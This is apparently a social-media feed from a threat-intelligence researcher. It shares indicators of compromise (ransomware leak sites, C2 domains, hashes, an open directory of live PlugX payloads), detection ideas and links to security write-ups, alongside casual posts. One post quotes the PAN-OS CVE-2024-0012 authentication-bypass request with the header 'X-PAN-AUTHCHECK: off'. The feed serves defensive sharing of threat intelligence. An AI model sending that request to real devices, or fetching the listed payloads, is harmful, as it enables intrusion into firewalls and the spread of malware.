
Posts by Mimi_Sec

Hope you get to feeling better bud :)

1 year ago 1 0 0 0

Credit:AlvieriD

Bluebox Ransomware DLS

zu3wfrmrkl4ltqqnpt3owp3cwa33rqwod4gpe3ttb5o4vf2is2gzm6qd[.]onion

1 year ago 0 0 0 0

Socgolish Domain:

*.material[.]amstillroofing[.]com

1 year ago 2 1 0 0

"We can now share that our latest investigation also found links between some of Doppelganger’s activities and individuals associated with MGIMO (Moscow State Institute of International Relations)."

via Meta/PDF: scontent.fotp7-2.fna.fbcdn.net/v/t39.8562-6...

1 year ago 11 6 0 0

Research_Reports.zip 6a15b145267baf3c492af4a9e8ee4f244ee5070f9a02e5516c12d78bcd60e4ff
interesting, using a domain name that isn't registered ... perhaps a typo? #apt #bitter

1 year ago 2 1 0 0

decoy on Security_Alert-US_MISSION_TO_PAKISTAN.pdf.lnk, beat by yogesh across the river by 31 minutes 😐
c2 vorm.vormliebe[.]club
d60e979ee44c9dc16e36657ec3a41016627cc685965befed018058986dd5d45e

1 year ago 3 1 0 0

More great examples of why you need to give employees a trusted PDF tool
pdfskillspro[.]com
pdskillsapp[.]com
Literally uploads files to their servers while saying they don't.

1 year ago 8 3 0 1

FunkSec Ransomware DLS

7ixfdvqb4eaju5lzj4gg76kwlrxg4ugqpuog5oqkkmgfyn33h527oyyd[.]onion

1 year ago 0 0 0 0

I try to write technical blogs regularly on topics I’m interested in. Recently this has been a lot of reverse engineering, Bluetooth, and networking hacks. But there’s many other goodies too!

As I’m invested in this aspect of bsky succeeding, here’s a thread of my posts. Comments encouraged!

1 year ago 34 8 1 0

Initial Access Detection Opportunities
🖥️ Quickassist detection: x.com/mthcht/statu...
✉️ High volume of external emails sent to a single recipient
💬 Teams interaction with a foreign tenant x.com/mthcht/statu... x.com/hir3n_s/stat...
filter on usernames with IT,Help,Desk,support,Tech,Customer,Microsoft

1 year ago 8 3 0 0

RomCom/Storm-0978 exploits Firefox and Windows zero days in the wild
Firefox 0day CVE-2024-9680 + Windows privilege escalation 0day CVE-2024-49039
welivesecurity.com/en/eset-rese...

1 year ago 1 1 0 0

Not quite Clue (would be a sick board game) but there's a pretty neat one called Backdoors and Breaches from BHIS that has similar vibe. Pretty cool lil deck of cards.

1 year ago 0 0 2 0
Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 Note: Since this is 'breaking' news and more details are being released, we're updating this post as more details become available (and as we think of better memes). Mash that F5 key every so often fo...

GET /php/ztp_gate.php/.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off

GTFO! Come on, they are laughing at us now.

labs.watchtowr.com/pots-and-pan...

1 year ago 33 11 2 3
Helldown Ransomware: an overview of this emerging threat Comprehensive Analysis of Helldown: Tactics, Techniques, and Procedures (TTPs) and Exploitation of Zyxel Vulnerabilities


New Helldown ransomware targets Windows and Linux systems, uses Zyxel firewall exploits for initial access

blog.sekoia.io/helldown-ran...

1 year ago 21 8 0 0
AiTM Phishing, Hold the Gabagool: Analyzing the Gabagool Phishing Kit Case study

medium.com/@traclabs_/a...

1 year ago 0 0 0 0
Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware

🚨🇺🇸Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware
darkwebinformer.com/sealevel-con...

1 year ago 1 1 0 0
QuickBooks popup scam still being delivered via Google ads | Malwarebytes When trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.

The certificate on this malware caught my eye. 👀
Starts with Google Ad, malware signed by Microsoft, and ends in support scam.

It checks if Quickbooks is running, checks the day of week, tells you to call a "support" number before killing Quickbooks.

www.malwarebytes.com/blog/scams/2...

1 year ago 2 1 0 0
A goomba looking Garfield on a white background that has a message at the top: “Repost to waste 151k of Internet’s data”

You all know what to do

1 year ago 21 8 2 1
opendir apache-ish listing for 103.43.18.81

if plugx is your game, open dir with live payloads
103.43.18[.]71:88 #apt #malware
files archived here for homegamers github.com/StrikeReady-...

1 year ago 13 4 0 1
decoy doc showing forged singapore customs information

#sidewinder #apt targeting singapore with "sg customs" lure
c2 advisories-sgcustoms.d0cumentview[.]info
40159fcfe9793a8a13111131e31f10eb1652343f6b9d172e2cadc821bc5f28fd (uploaded from SG)
NO-712024.docx

1 year ago 4 1 0 0
Smokeloader: The Pandora’s box of tricks, payloads and anti-analysis - BSides Portland 2022 (YouTube video by BSides Portland)

Smokeloader keeps crawling its way back into the limelight. If you want a primer on it, I gave a public talk on it 2 years ago

www.youtube.com/watch?v=O69e...

1 year ago 24 9 1 0

Using EclecticIQ’s analysis, I uncovered 39 additional domains linked to Chinese #ThreatActor #SilkSpecter, impersonating brands like IKEA, The North Face, Zalando and Zara.

Key IOCs:
trusttollsvg.js
collect.js

#ThreatIntel #OSINT #Scam #BlackFriday #Phishing

blog.eclecticiq.com/inside-intel...

1 year ago 9 4 0 0

🚨New Ransomware Group, "Termite," has named their first 5 victims
termiteuslbumdge2zmfmfcsrvmvsfe4gvyudc5j6cdnisnhtftvokid[.]onion

1 year ago 4 2 0 0
Impostor Certificates It is common for malware to be signed with code signing certificates. How is this possible? Impostors receive the cert directly and sign malware. In this blog-post, we look at 100 certs used by Sol…

May 13, 2024 blogpost
It is common for malware to be signed with code signing certificates.

How is this possible? Impostors receive the cert directly and sign malware.

In this blog-post, we look at 100 certs used by #Solarmarker #malware to learn more.

squiblydoo.blog/2024/05/13/i...

1 year ago 11 5 0 0

Said it once I'll say it again, UFO 50 and Animal Well are masterpieces worth every minute.

1 year ago 0 0 0 0

Man, mass purging tweets is kind of a pain in the butt huh lol.

1 year ago 0 0 0 0

Absolute banger of a show, great writing and story. Really hope we get that MMO they were hammering on for a while, I need more of the lore in my veins.

1 year ago 0 0 0 0
Breachachu Has Allegedly Leaked the Source Code to Emirates Phishing Kit Archive

🚨Breachachu Has Allegedly Leaked the Source Code to Emirates Phishing Kit Archive
darkwebinformer.com/breachachu-h...

1 year ago 1 1 0 0